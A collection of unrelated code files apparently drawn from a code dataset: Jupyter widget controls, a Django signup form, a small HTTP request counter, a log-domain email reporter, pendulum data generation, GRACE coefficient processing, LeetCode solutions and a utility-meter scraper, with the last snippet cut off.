description='totalarea',layout=cell_layout)
in_beta = widgets.FloatSlider(value=self.beta, min=0., max=50.,step=0.1,
description='beta',layout=cell_layout,readout_format='.2e')
in_gamma = widgets.FloatSlider(value=self.gamma, min=0., max=3.0, step=0.1,
description='gamma',layout=cell_layout,readout_format='.2e')
in_pn = widgets.IntSlider(value=self.pn, min=-1, max=1, step=1,
description='pn',layout=cell_layout)
#linkages
arealink = widgets.jslink((in_lightarea,'value'), (in_totalarea,'min')) #also jsdlink works
attr = ['name']+self.ATTR.copy()
cntrls = [in_name, in_Eg,in_TC,in_Gsh,in_Rser,in_lightarea,in_totalarea,
in_Jext,in_JLC,in_beta,in_gamma,in_pn]
sing_dict = dict(zip(attr,cntrls))
#singout = widgets.interactive_output(self.set, sing_dict) #all at once
def on_juncchange(change):
# function for changing values
old = change['old'] #old value
new = change['new'] #new value
owner = change['owner'] #control
value = owner.value
desc = owner.description
if new == old:
with self.debugout: print('Jcontrol: ' + desc + '=', value)
else:
with self.debugout: print('Jcontrol: ' + desc + '->', value)
self.set(**{desc:value})
#iout.clear_output()
#with iout: print(self)
# diode array
in_tit = widgets.Label(value='Junction', description='Junction')
in_diodelab = widgets.Label(value='diodes:', description='diodes:')
diode_layout = widgets.Layout(flex_flow='column',align_items='center')
cntrls.append(in_diodelab)
in_n = [] # empty list of n controls
in_ratio = [] # empty list of Jratio controls
hui = []
diode_dict = {}
for i in range(len(self.n)):
in_n.append(widgets.FloatLogSlider(value=self.n[i], base=10, min=-1, max=1, step=0.001,
description='n['+str(i)+']',layout=cell_layout))
in_ratio.append(widgets.FloatLogSlider(value=self.J0ratio[i], base=10, min=-6, max=6, step=0.1,
description='J0ratio['+str(i)+']',layout=cell_layout))
cntrls.append(in_n[i])
cntrls.append(in_ratio[i])
diode_dict['n['+str(i)+']'] = in_n[i]
diode_dict['J0ratio['+str(i)+']'] = in_ratio[i]
#hui.append(widgets.HBox([in_n[i],in_ratio[i]]))
#cntrls.append(hui[i])
#diodeout = widgets.interactive_output(self.set, diode_dict) #all at once
if self.RBB_dict:
RBB_keys = list(self.RBB_dict.keys())
in_rbblab = widgets.Label(value='RBB:', description='RBB:')
cntrls.append(in_rbblab)
in_rbb = [] # empty list of n controls
for i, key in enumerate(RBB_keys):
with self.debugout: print('RBB:',i,key)
if key == 'method':
in_rbb.append(widgets.Dropdown(options=['','JFG','bishop'],value=self.RBB_dict[key],
description=key, layout=cell_layout, continuous_update=False))
else:
in_rbb.append(widgets.FloatLogSlider(value=self.RBB_dict[key], base = 10, min=-10, max=5, step=0.1,
description=key,layout=cell_layout))
cntrls.append(in_rbb[i])
for cntrl in cntrls:
cntrl.observe(on_juncchange,names='value')
#output
iout = widgets.Output()
iout.layout.height = '5px'
#with iout: print(self)
cntrls.append(iout)
# user interface
box_layout = widgets.Layout(display='flex',
flex_flow='column',
align_items='center',
border='1px solid black',
width='320px',
height = '350px')
ui = widgets.VBox([in_tit] + cntrls,layout=box_layout)
self.ui = ui # make it an attribute
return ui
|
992,150 | ee18b3aa22cc758872a3e8061e9180be1748fb94 | from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
class CreateUserForm(UserCreationForm):
password1 = forms.CharField(widget=forms.PasswordInput(
attrs={"name": "password1", 'placeholder': 'Mot de passe'}))
password2 = forms.CharField(widget=forms.PasswordInput(
attrs={"name": "password2", 'placeholder': 'Confirmer mot de passe'}))
class Meta:
model = User
fields = ['username', 'first_name', 'last_name', 'email', 'password1', 'password2']
widgets = {
'username': forms.TextInput(attrs={"name": "username", "placeholder": "Nom d'utilisateur"}),
'first_name': forms.TextInput(attrs={"name": "first_name", "placeholder": "Prénom"}),
'last_name': forms.TextInput(attrs={"name": "last_name", "placeholder": "Nom"}),
'email': forms.TextInput(attrs={"name": "email", "placeholder": "Email"}),
}
|
992,151 | 35275ec2302cb0adab48400b25a5d32de5a6d132 | import threading
from time import sleep, time
from curl import request
successfull_requests_count = 0
un_successfull_requests_count = 0
class Requester(threading.Thread):
def __init__(self, uri, name, requests_count, headers={}, user_agent="PostmanRuntime/7.15.2", verbose=False):
super().__init__()
self.name = name
self.uri = uri
self.user_agent = user_agent
self.headers = headers
self.requests_count = requests_count
self.verbose = verbose
def run(self):
global successfull_requests_count
global un_successfull_requests_count
for _ in range(0, self.requests_count):
sleep(1)
resp = request(
uri=self.uri,
ssl_verify=False,
verbose=self.verbose,
headers=self.headers,
user_agent=self.user_agent
)
if resp['res_code'] == 200:
successfull_requests_count += 1
else:
un_successfull_requests_count += 1
# print(self.name, 'request number ' + str(i), resp['res_code'])
class ThreadsLifeChecker(threading.Thread):
def __init__(self, thread_objects):
super().__init__()
self.thread_objects = thread_objects
def run(self):
while True:
alive_threads_count = 0
for thread in self.thread_objects:
if thread.is_alive():
alive_threads_count += 1
if alive_threads_count == 0:
end = time()
print("sended requests count is: ", (threads_count * thread_requests_count))
print("success requests count is: ", successfull_requests_count)
print("unsuccess requests count is: ", un_successfull_requests_count)
print("execution time is: ", (end - start))
break
sleep(0.2)
if __name__ == '__main__':
threads_count = 100
thread_requests_count = 4
thread_objects_array = []
start = time()
for i in range(0, threads_count):
th_object = Requester(uri="http://google.com", name="Thread " + str(i), requests_count=thread_requests_count)
thread_objects_array.append(th_object)
th_object.start()
sleep(0.1)
ThreadsLifeChecker(thread_objects=thread_objects_array).start()
|
992,152 | f78ec134eb5298bd4813f7b2486989d458ccd51d | #!/usr/local/python2711/bin/python
# *-* coding:utf-8 *-*
import re
import os
import sys
import time
import datetime
import subprocess
from time import clock as now
import smtplib
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
import socket
import fcntl
import struct
#time1 = now()
before = datetime.datetime.now() - datetime.timedelta(days=1)
beforedate = before.strftime("%Y-%m-%d")
#LOG_DIR = '/data/' + CP + '/' + ROLE + '/access_log'
backupdir = '/opt/domaincount/' + beforedate
## global var
lfile = backupdir + '/' + 'nimei2.txt'
def getfile():
subprocess.Popen("mkdir -p " + backupdir, shell=True)
#print "cd " + LOG_DIR + ' && ' + 'ls -lthr --time-style=long-iso | awk ' + "'" + '/' + beforedate + '/' + "'" + " | awk '{print $NF}'"
flist = "cd " + LOG_DIR + ' && ' + 'ls -lthr --time-style=long-iso | awk ' + "'" + '/' + beforedate + '/' + "'" + " | awk '{print $NF}'"
f2 = subprocess.Popen(flist, stdout=subprocess.PIPE, shell=True)
f2.wait()
file1 = f2.stdout.read().replace('\n', ' ')
if len(file1):
#if os.path.exists(LOG_DIR + '/' + file1):
#print "cd " + LOG_DIR + ' && ' + "cat " + file1 + '> ' + lfile
file2 = "cd " + LOG_DIR + ' && ' + "cat " + file1 + '> ' + lfile
f1 = subprocess.Popen(file2, shell=True)
f1.wait()
else:
#print LOG_DIR + ' file is not exists'
return 0
def getip(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def treatfile(log_path = lfile):
ip_info = {}
new_ip_info = {}
with open(log_path,'r') as f:
for line in f.readlines():
line = line.strip()
if not len(line):
continue
## 获取client ip
#ip = line.split('の')[2]
#print ip
## 获取client access domain
try:
domain = line.split('の')[4]
except IndexError,e:
#print "error: domain %s" % e
continue
## 获取client acces url
#url = line.split('の')[5]
#print url
#if ip not in ip_info:
# ip_info[ip] = {url:1}
#else:
# if url not in ip_info[ip]:
# ip_info[ip][url] = 1
# else:
# ip_info[ip][url] += 1
if domain not in ip_info:
ip_info[domain] = 1
else:
ip_info[domain] += 1
## 删除字典中key值是-的元素
if '-' in ip_info.keys():
del ip_info['-']
old_result = sorted(ip_info.items(), lambda x, y: cmp(x[1], y[1]), reverse=True)[0:23]
## re.search()
for k,v in old_result:
if re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', k) != None:
continue
elif re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:(\d+)$', k) != None:
continue
new_ip_info[k] = v
## re.match()
#for k,v in old_result:
# if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', k) != None:
# continue
# elif re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:(\d+)$', k) != None:
# continue
# new_ip_info[k] = v
## 模糊匹配,同时匹配IP和IP:PORT
#for k,v in old_result:
# if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', k) != None:
# continue
# new_ip_info[k] = v
new_result = sorted(new_ip_info.items(), lambda x, y: cmp(x[1], y[1]), reverse=True)
for k,v in new_result:
# python 2.6.6
#print CP + ' ' + '{0} {1}'.format(str(v),k)
#print ("%-5s" % CP) + ("%-10d" % v) + ("%-10s" % k)
result2 = ("%-5s" % CP) + ',' + ("%-10d" % v) + ',' + ("%-10s" % k) + '\n'
#result2 = CP + ',' + '{1},{0}'.format(str(v),k) + '\n'
# python 2.7.11
#print '{:10s} {:<10s}'.format(str(v),k)
#result2 = '{:10s} {:<10s}'.format(str(v),k) + '\n'
with open(result3, 'a+') as f2:
f2.write(result2)
f2.close()
f.close()
## sendmail
def SendMail():
HOST = "1.1.1.1"
PORT = "25"
SUBJECT = u"产品域名统计 from %s" % getip('eth0')
TO = ["to_mail1","to_mail2"]
FROM = "from_mail"
CC = ["cc_mail"]
tolist = ','.join(TO)
cclist = ','.join(CC)
msgtext2 = MIMEText(beforedate + '' + '排名前20的域名:' + '\n' + open(result3,"rb").read().replace(',',' '))
msgtext1 = MIMEText("""
<table width="800" border="0" cellspacing="0" cellpadding="4">
<tr>
<td bgcolor="#CECFAD" height="20" style="font-size:14px">排名前20的域名: <a href="www.w66.com">点我点我</a></td>
</tr>
</table>""","html","utf-8")
msg = MIMEMultipart()
#msg.attach(msgtext1)
msg.attach(msgtext2)
#print result3
attach = MIMEText(open(result3,"rb").read(), "base64", "utf-8")
attach["Content-Type"] = "application/octet-stream"
attach["Content-Disposition"] = "attachment; filename=\"web_domain_count.csv\"".decode("utf-8").encode("utf-8")
msg.attach(attach)
msg['Subject'] = SUBJECT
msg['From'] = FROM
msg['To'] = tolist
msg['Cc'] = cclist
try:
server = smtplib.SMTP()
server.connect(HOST, PORT)
#server.starttls()
#server.login("test@gmail.com","123456")
server.sendmail(FROM, TO + CC, msg.as_string())
server.quit()
#print "send mail success!"
except Exception, e:
print "Error: " + str(e)
if __name__ == "__main__":
CPS = ['A01', 'A03', 'A04', 'A05', 'A07', 'B01', 'C02', 'E02', 'E03', 'E04']
ROLE = 'web'
result3 = backupdir + '/' + 'web_domain_count.csv'
os.system('rm -f ' + result3)
for CP in CPS:
#print '-------------%s-----------' % CP
LOG_DIR = '/data/' + CP + '/' + ROLE + '/access_log'
if getfile() is 0:
print
continue
treatfile()
#print
SendMail()
time2 = now()
#print
#print 'run time is ' + str(time2 - time1) + 's'
|
992,153 | 788e87d5962b75d7ed7190d7e5c66940b7657ec0 | import numpy as np
from scipy.integrate import odeint
def get_pendulum_data(n_training_ics, n_validation_ics, n_test_ics):
t,u,du,ddu,v = generate_pendulum_data(n_training_ics)
training_data = {}
training_data['t'] = t
training_data['x'] = u.reshape((n_training_ics*t.size, -1))
training_data['dx'] = du.reshape((n_training_ics*t.size, -1))
training_data['ddx'] = ddu.reshape((n_training_ics*t.size, -1))
training_data['z'] = v.reshape((n_training_ics*t.size, -1))[:,0:1]
training_data['dz'] = v.reshape((n_training_ics*t.size, -1))[:,1:2]
t,u,du,ddu,v = generate_pendulum_data(n_validation_ics)
val_data = {}
val_data['t'] = t
val_data['x'] = u.reshape((n_validation_ics*t.size, -1))
val_data['dx'] = du.reshape((n_validation_ics*t.size, -1))
val_data['ddx'] = ddu.reshape((n_validation_ics*t.size, -1))
val_data['z'] = v.reshape((n_validation_ics*t.size, -1))[:,0:1]
val_data['dz'] = v.reshape((n_validation_ics*t.size, -1))[:,1:2]
t,u,du,ddu,v = generate_pendulum_data(n_test_ics)
test_data = {}
test_data['t'] = t
test_data['x'] = u.reshape((n_test_ics*t.size, -1))
test_data['dx'] = du.reshape((n_test_ics*t.size, -1))
test_data['ddx'] = ddu.reshape((n_test_ics*t.size, -1))
test_data['z'] = v.reshape((n_test_ics*t.size, -1))[:,0:1]
test_data['dz'] = v.reshape((n_test_ics*t.size, -1))[:,1:2]
return training_data, val_data, test_data
def generate_pendulum_data(n_ics):
f = lambda x, t : [x[1], -np.sin(x[0])]
t = np.arange(0, 10, .02)
x = np.zeros((n_ics,t.size,2))
dx = np.zeros(x.shape)
x1range = np.array([-np.pi,np.pi])
x2range = np.array([-2.1,2.1])
i = 0
while (i < n_ics):
x0 = np.array([(x1range[1]-x1range[0])*np.random.rand()+x1range[0],
(x2range[1]-x2range[0])*np.random.rand()+x2range[0]])
if np.abs(x0[1]**2/2. - np.cos(x0[0])) > .99:
continue
x[i] = odeint(f, x0, t)
dx[i] = np.array([f(x[i,j], t[j]) for j in range(len(t))])
i += 1
n = 51
xx,yy = np.meshgrid(np.linspace(-1.5,1.5,n),np.linspace(1.5,-1.5,n))
create_image = lambda theta : np.exp(-((xx-np.cos(theta-np.pi/2))**2 + (yy-np.sin(theta-np.pi/2))**2)/.05)
argument_derivative = lambda theta,dtheta : -1/.05*(2*(xx - np.cos(theta-np.pi/2))*np.sin(theta-np.pi/2)*dtheta \
+ 2*(yy - np.sin(theta-np.pi/2))*(-np.cos(theta-np.pi/2))*dtheta)
argument_derivative2 = lambda theta,dtheta,ddtheta : -2/.05*((np.sin(theta-np.pi/2))*np.sin(theta-np.pi/2)*dtheta**2 \
+ (xx - np.cos(theta-np.pi/2))*np.cos(theta-np.pi/2)*dtheta**2 \
+ (xx - np.cos(theta-np.pi/2))*np.sin(theta-np.pi/2)*ddtheta \
+ (-np.cos(theta-np.pi/2))*(-np.cos(theta-np.pi/2))*dtheta**2 \
+ (yy - np.sin(theta-np.pi/2))*(np.sin(theta-np.pi/2))*dtheta**2 \
+ (yy - np.sin(theta-np.pi/2))*(-np.cos(theta-np.pi/2))*ddtheta)
u = np.zeros((n_ics, t.size, n, n))
du = np.zeros((n_ics, t.size, n, n))
ddu = np.zeros((n_ics, t.size, n, n))
for i in range(n_ics):
for j in range(t.size):
x[i,j,0] = wrap_to_pi(x[i,j,0])
u[i,j] = create_image(x[i,j,0])
du[i,j] = (create_image(x[i,j,0])*argument_derivative(x[i,j,0], dx[i,j,0]))
ddu[i,j] = create_image(x[i,j,0])*((argument_derivative(x[i,j,0], dx[i,j,0]))**2 \
+ argument_derivative2(x[i,j,0], dx[i,j,0], dx[i,j,1]))
return t,u,du,ddu,x
def wrap_to_pi(x):
x_mod = x % (2*np.pi)
subtract_m = (x_mod > np.pi) * (-2*np.pi)
return x_mod + subtract_m
|
992,154 | 3371afa1f2a520d8b37268acb13f554e91108a25 | import gzip
import os
import tkFileDialog
import xlsxwriter
import Tkinter as tk
import numpy as np
class TemporalMeanFrame(tk.Frame):
def __init__(self, master=None):
tk.Frame.__init__(self, master)
self.master = master
self.init_window()
def init_window(self):
self.master.title("Temporal Mean Calculation")
self.pack(fill=tk.BOTH, expand=1)
inputgracedirlbl = tk.Label(self.master, text="Raw Data Directory")
inputgracedirlbl.place(x=20, y=50)
self.inputgracedirtxtfield = tk.Text(self.master, height=1, width=50)
self.inputgracedirtxtfield.place(x=130, y=50)
inputgracedirbtn = tk.Button(self.master, text="Browse", command=self.selectgracerawdatadir)
inputgracedirbtn.place(x=540, y=47)
self.startcalculatingtemporalmeanbtn = tk.Button(self.master, text="Calculate Temporal Mean",
command=self.calculatetemporalmean)
self.startcalculatingtemporalmeanbtn.place(x=450, y=200)
self.cancelbtn = tk.Button(self.master, text="Cancel", command=self.exit)
self.cancelbtn.place(x=400, y=200)
self.opentemporalmeanbtn = tk.Button(self.master, text="Open Temporal Mean", command=self.opentemporalmean)
self.opentemporalmeanbtn.place(x=50, y=200)
self.opentemporalmeanbtn.config(state="disabled")
def exit(self):
self.master.destroy()
def selectgracerawdatadir(self):
self.inputfilespath = tkFileDialog.askdirectory(initialdir="/", title="Select GRACE Raw Data Directory")
self.files = os.listdir(self.inputfilespath)
nooffiles = "No of Files= " + str(len(self.files))
self.nooffileslbl = tk.Label(self.master, text=nooffiles)
self.nooffileslbl.place(x=20, y=100)
def calculatetemporalmean(self):
self.cancelbtn.config(state="disabled")
self.startcalculatingtemporalmeanbtn.config(state="disabled")
# Creating clm_all & slm_all container (degree x order x num_of_files)
grace_base = 60 # grace base either 60 or 96
max_files = 200 # maximum number of files used expected
clm_all = np.zeros(dtype='f', shape=[grace_base + 1, grace_base + 1, max_files])
slm_all = np.zeros(dtype='f', shape=[grace_base + 1, grace_base + 1, max_files])
index = -1
filenames = []
if not os.path.exists(self.inputfilespath + '/raw/'):
os.makedirs(self.inputfilespath + '/raw/')
if not os.path.exists(self.inputfilespath + '/processed/'):
os.makedirs(self.inputfilespath + '/processed/')
workbook = xlsxwriter.Workbook(self.inputfilespath + '/raw/' + 'GRACE Raw Data.xlsx')
worksheet = workbook.add_worksheet()
# Header
# worksheet.write(0, 0, 'Coefficient')
# worksheet.write(0, 1, 'Degree')
worksheet.write(0, 0, 'Order')
worksheet.write(0, 1, 'Degree')
worksheet.write(0, 2, 'Clm Mean')
worksheet.write(0, 3, 'Slm Mean')
for x in self.files:
if ".gz" in x:
try:
filename = x.split('.')[0] # File Name without extension
filenames.append(filename)
with gzip.open(self.inputfilespath + '/' + x, 'rb') as f:
file_content = f.read()
o = open(self.inputfilespath + '/raw/' + filename + '.txt', 'w')
o.write(file_content)
o.close()
except Exception as e:
print(e)
print "Could not read " + x
continue
else:
print("File " + x + " is not a .gz file")
continue
for x in self.files:
# print x[6:26]
if ".gz" in x:
index += 1
print "Starting in file:" + x[6:26]
try:
f = gzip.GzipFile(self.inputfilespath + '/' + x, "r")
data = f.readlines()[7:] # read from the line no 7.. you should later add the coeff. (0,0) values
for entry in data:
tmp = entry.split(' ')
m = []
for n in tmp:
if n != '':
m.append(n)
clm_all[int(m[1]), int(m[2]), index] = float(m[3])
slm_all[int(m[1]), int(m[2]), index] = float(m[4])
f.close()
except:
print "Could not open " + x
continue
print index # counter for num of files processed
print clm_all.shape
print slm_all.shape
# delete all empty layers (more than 163 will be deleted)
# clm & slm are filled, num of layers = index
clm_all = clm_all[:, :, 0:index + 1]
slm_all = slm_all[:, :, 0:index + 1]
# calculate mean for clm and slm
clm_mean = np.mean(clm_all, axis=2)
slm_mean = np.mean(slm_all, axis=2)
# subtract mean from each layer in clm and slm
clm_cleaned = np.zeros(dtype='f', shape=[grace_base + 1, grace_base + 1, index + 1])
slm_cleaned = np.zeros(dtype='f', shape=[grace_base + 1, grace_base + 1, index + 1])
for layer in range(index + 1):
clm_cleaned[:, :, layer] = clm_all[:, :, layer] - clm_mean
slm_cleaned[:, :, layer] = slm_all[:, :, layer] - slm_mean
count = 1
for xx in range(0, grace_base + 1):
for yy in range(0, xx + 1):
# print "[" + str(xx) + ", " + str(yy) + "]"
worksheet.write(count, 0, xx)
worksheet.write(count, 1, yy)
worksheet.write(count, 2, clm_mean[xx, yy])
worksheet.write(count, 3, slm_mean[xx, yy])
count += 1
workbook.close()
for i in range(index + 1):
try:
o = open(self.inputfilespath + '/processed/' + "filtered.month." + str(i).zfill(3) + '.txt', 'w')
# o = open(self.inputfilespath + '/processed/' + filenames[i] + '.txt', 'w')
for xx in range(0, grace_base + 1):
for yy in range(0, xx + 1):
o.write('{0:6d}'.format(xx) + " " + '{0:6d}'.format(yy) + " " + (
'%.8E' % clm_cleaned[xx, yy, i]) + " " + ('%.8E' % slm_cleaned[xx, yy, i]) + "\n")
o.close()
except Exception as e:
print(e)
print "Could not read " + x
continue
#########################################
#########################################
self.opentemporalmeanbtn.config(state="active")
self.cancelbtn.config(state="active")
def opentemporalmean(self):
os.chdir(self.inputfilespath)
os.system('start excel.exe "%s/raw/GRACE Raw Data.xlsx"' % (self.inputfilespath,))
# os.system('start excel.exe "%s\\MonthIndex.xlsx"' % (self.inputfilespath,))
|
992,155 | 80ce028646bd5c22e3dd790c18490923f352f629 | import sh
def main(fname_pair_list):
for source_url, target_url in fname_pair_list:
if source_url.endswith('.zst'):
sh.zstd('-d', source_url, '-o', target_url)
else:
sh.cp('-v', source_url, target_url)
if __name__ == '__main__':
assert len(snakemake.input) == len(snakemake.output)
main(zip(snakemake.input, snakemake.output))
|
992,156 | 9bf4bffdacbfb4d88c8073ad4b5ea96fed06d23d | class Solution:
def longestCommonPrefix(self, strs: List[str]) -> str:
return self.common_prefix(strs)
def common_prefix(self, strs: List[str]) -> str:
min_str = len(min(strs, key=len))
N = len(strs)
lo = 0
hi = min_str - 1
prefix = ''
while (lo<=hi):
mid = lo + (hi-lo) // 2
if self.is_common_prefix(strs, N, lo, mid):
prefix = strs[0][0:mid+1]
lo = mid + 1
else:
hi = mid - 1
return prefix
def is_common_prefix(self, strs, n, begin, end):
t = strs[0]
for i in range(n):
s = strs[i]
for j in range(begin, end+1):
if s[j] != t[j]:
return False
return True
def solve(self, strs: List[str]) -> str:
if len(strs) == 0:
return ""
common_prefix = []
trial = min([len(el) for el in strs])
for i in range(trial):
if i+1 > trial:
break
prefix = [s[:i+1] for s in strs]
if len(set(prefix)) != 1:
break
common_prefix = prefix.copy()
if len(common_prefix) == 0: return ""
return common_prefix[0]
|
992,157 | c1a3801ea5c05ae65f796a061c36fb675ee9027b | import numpy as np
import os
import random
import torch
from torch.utils.tensorboard import SummaryWriter
from model import RNNActorCriticNetwork
from env import create_train_env
from config import get_args
def main():
args = get_args()
device = torch.device('cuda' if args.cuda else 'cpu')
env = create_train_env(1, args.difficulty, args.macro, 'env1.mp4')
input_size = env.observation_space.shape[0]
output_size = env.action_space.n
model = RNNActorCriticNetwork(input_size, output_size,
args.noise_linear).to(device)
model.eval()
dummy_input = torch.rand(1, 1, *env.observation_space.shape).to(device=device)
writer = SummaryWriter(log_dir=args.log_dir)
writer.add_graph(model, (dummy_input, ))
if __name__ == '__main__':
main() |
992,158 | 7d3edac42df95953ac4c578c4e9a3dff09a7cb0e | from typing import Any
def add_operation(
dn, attributes, auto_encode, schema: Any | None = ..., validator: Any | None = ..., check_names: bool = ...
): ...
def add_request_to_dict(request): ...
def add_response_to_dict(response): ...
|
992,159 | bd68a43353a539b997c53162ae785ca4efb5a247 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
URL_QUERY = 'http://60.190.19.138:7080/stu/sel_result.jsp'
REGEX_TR = r'<tr>[\s\S]*?<\/tr>'
REGEX_TH = r'<th[\s\S]*?>[\s\S]*?<\/th>'
REGEX_TD = r'<td[\s\S]*?>([\s\S]*?)<\/td>'
REGEX_NUM = r'[\d\.]+'
REGEX_TIME = r'The above information up to ([\s\S]*?)<\/'
REGEX_BACK = r'history\.back\(\);'
import codecs
import os
import re
import datetime, time
import urlparse
import urllib3
import sqlite3
import leveldb
import json
import os
count = 0
def str2fen(s):
return int(float(s)*100)
def loadConfig():
global config
with open(os.path.join(os.path.dirname(__file__), '../../config.json')) as f:
config = json.load(f);
def initDatabase():
global conn, cursor, saveCursor, roomCursor
conn = sqlite3.connect(os.path.join(os.path.dirname(__file__), '../..', config['db']['path'], config['db']['sqlite']['coal']))
cursor = conn.cursor()
saveCursor = conn.cursor()
roomCursor = conn.cursor()
cursor.execute('CREATE TABLE IF NOT EXISTS roomlist (id INTEGER PRIMARY KEY, build INTEGER, room INTEGER)')
cursor.execute('CREATE TABLE IF NOT EXISTS data (rid, water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money, time)')
cursor.execute('CREATE TABLE IF NOT EXISTS usage (rid, water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money, time)')
global userbind
userbindPath = os.path.join(os.path.dirname(__file__), '../..', config['db']['path'], config['db']['level']['userbind'])
os.remove(os.path.join(userbindPath, 'LOCK'))
userbind = leveldb.LevelDB(userbindPath)
def rowInserted():
global count
count += 1
if count % 100 == 0:
conn.commit()
def updateRoomList():
for key, value in userbind.RangeIter(include_value = True):
data = json.loads(value)
if data.has_key('build') and data.has_key('room'):
if not checkRoomExist(data['build'], data['room']): # 假定列表里的房间已查询
ret = performQuery(data['build'], data['room'])
if ret:
roomCursor.execute('INSERT INTO roomlist (build, room) VALUES (?,?)', (data['build'], data['room']))
conn.commit()
rid = roomCursor.lastrowid
saveResultByRid(rid, ret)
def loadHTTPPool():
global uri_parsed, http_pool
uri_parsed = urlparse.urlparse(URL_QUERY)
http_pool = urllib3.HTTPConnectionPool(uri_parsed.hostname, uri_parsed.port)
def performQueryForRoomList():
roomCursor.execute('SELECT id, build, room FROM roomlist')
room = roomCursor.fetchone()
while room:
if not checkTodayExistByRid(room[0]):
ret = performQuery(room[1], room[2])
if ret:
saveResultByRid(room[0], ret)
room = roomCursor.fetchone()
def performQuery(build, room):
data = "build={0}&room={1}&xw=%D0%A3%CD%E2%B2%E9%D1%AF".format(build, room)
req = http_pool.urlopen('POST', uri_parsed.path, headers={'Content-Type': 'application/x-www-form-urlencoded'}, body=data)
html = req.data.decode('gbk')
if re.search(REGEX_BACK, html):
return None
else:
ret = {}
time_str = re.search(REGEX_TIME, html).group(1)
time_datetime = datetime.datetime.strptime(time_str, '%Y-%m-%d %H:%M %p')
ret['timestamp'] = int(time.mktime(time_datetime.timetuple()))
tr_tags = re.findall(REGEX_TR, html)
for tr_tag in tr_tags:
if re.search(REGEX_TH, tr_tag):
continue
td_tags = re.findall(REGEX_TD, tr_tag)
value_match = re.search(REGEX_NUM, td_tags[1])
if value_match:
value = str2fen(value_match.group(0))
else:
value = -1
money_match = re.search(REGEX_NUM, td_tags[2])
if money_match:
money = str2fen(money_match.group(0))
else:
money = -1
item = {
'value': value,
'money': money
}
if td_tags[0].find(u'冷水表') != -1:
ret['water'] = item
if td_tags[0].find(u'热水表') != -1:
ret['hotwater'] = item
if td_tags[0].find(u'电表') != -1:
ret['electricity'] = item
return ret
def checkRoomExist(build, room):
cursor.execute('SELECT id FROM roomlist WHERE build=? AND room=? LIMIT 1', (build, room))
room = cursor.fetchone()
if room:
return room[0]
else:
return False
def checkTodayExistByRid(rid):
now = int(time.time())
cursor.execute('SELECT * FROM data WHERE rid=? AND time>=?-86400 AND time<? LIMIT 1', (rid, now, now))
if (cursor.fetchone()):
return True
else:
return False
def checkExistByRoom(build, room):
rid = checkRoomExist
if rid:
return checkTodayExistByRid(room['rid'])
else:
return False
def getYesterdayByRid(rid):
now = int(time.time())
cursor.execute('SELECT water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money FROM data WHERE rid=? AND time>=?-172800 AND time<?-86400 LIMIT 1', (rid, now, now))
yesterday = cursor.fetchone()
if yesterday:
return yesterday
else:
return None
def getUsage(today, yesterday):
if today == -1 or yesterday == -1:
return -1
else:
return today - yesterday
def saveResultByRid(rid, data):
saveCursor.execute('INSERT INTO data (rid, time, water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money) VALUES (?,?,?,?,?,?,?,?)',
(rid, data['timestamp'],
data['water']['value'],
data['water']['money'],
data['hotwater']['value'],
data['hotwater']['money'],
data['electricity']['value'],
data['electricity']['money']
)
)
yesterday = getYesterdayByRid(rid)
if yesterday:
saveCursor.execute('INSERT INTO usage (rid, time, water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money) VALUES (?,?,?,?,?,?,?,?)',
(rid, data['timestamp'],
getUsage(data['water']['value'], yesterday[0]),
getUsage(data['water']['money'], yesterday[1]),
getUsage(data['hotwater']['value'], yesterday[2]),
getUsage(data['hotwater']['money'], yesterday[3]),
getUsage(data['electricity']['value'], yesterday[4]),
getUsage(data['electricity']['money'], yesterday[5])
)
)
rowInserted()
def closeDatabase():
conn.commit()
conn.close()
if __name__ == '__main__':
count = 0
loadConfig()
initDatabase()
loadHTTPPool()
performQueryForRoomList()
updateRoomList()
closeDatabase()
print 'ALL DONE. AFFECTED ROOMS: %d' % count
|
992,160 | 480acc91a85ff8c67923d801a40012ad744c78ee | # -*- coding: utf-8 -*-
# from odoo import http
# class SaleAnticipo(http.Controller):
# @http.route('/sale_anticipo/sale_anticipo/', auth='public')
# def index(self, **kw):
# return "Hello, world"
# @http.route('/sale_anticipo/sale_anticipo/objects/', auth='public')
# def list(self, **kw):
# return http.request.render('sale_anticipo.listing', {
# 'root': '/sale_anticipo/sale_anticipo',
# 'objects': http.request.env['sale_anticipo.sale_anticipo'].search([]),
# })
# @http.route('/sale_anticipo/sale_anticipo/objects/<model("sale_anticipo.sale_anticipo"):obj>/', auth='public')
# def object(self, obj, **kw):
# return http.request.render('sale_anticipo.object', {
# 'object': obj
# })
|
992,161 | 6262aa40e1855f02015da462646a699d762d9ed3 | import pytest
from feathr import Feature, TypedKey, ValueType, INT32
def test_key_type():
key = TypedKey(key_column="key", key_column_type=ValueType.INT32)
assert key.key_column_type == ValueType.INT32
with pytest.raises(KeyError):
key = TypedKey(key_column="key", key_column_type=INT32)
def test_feature_type():
key = TypedKey(key_column="key", key_column_type=ValueType.INT32)
feature = Feature(name="name",
key=key,
feature_type=INT32)
assert feature.feature_type == INT32
with pytest.raises(KeyError):
feature = Feature(name="name",
key=key,
feature_type=ValueType.INT32) |
992,162 | 716105f3330f230b3cde15f0dc692083745e1c49 | '''class Result:
def __init__(self, value):
self.value = value
def __str__(self):
return f'{self.__class__.__name__}(value={self.value})'
def add_value(self, value: int) -> 'Result':
self.value += value
return self
@classmethod
def get(cls, value) -> 'Result':
return cls(value)
class NewResult(Result):
...
r = NewResult(10)
print(r.add_value(5))
print(NewResult.get(20))
class Node:
def __init__(self, data):
self.data = data
self.next: 'Node'|None = None
self.previous: 'Node'|None = None
